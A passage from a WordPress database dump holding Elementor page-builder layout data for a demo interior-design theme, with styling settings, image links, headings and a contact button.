\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(2995,4737,'_elementor_page_assets','a:1:{s:6:\"styles\";a:16:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";i:15;s:12:\"e-animations\";}}'),(2996,4737,'_elementor_pro_version','3.8.1'),(2997,4738,'_wp_page_template','elementor_header_footer'),(2998,4738,'_elementor_edit_mode','builder'),(2999,4738,'_elementor_template_type','wp-page'),(3000,4738,'_elementor_version','3.8.1'),(3001,4738,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\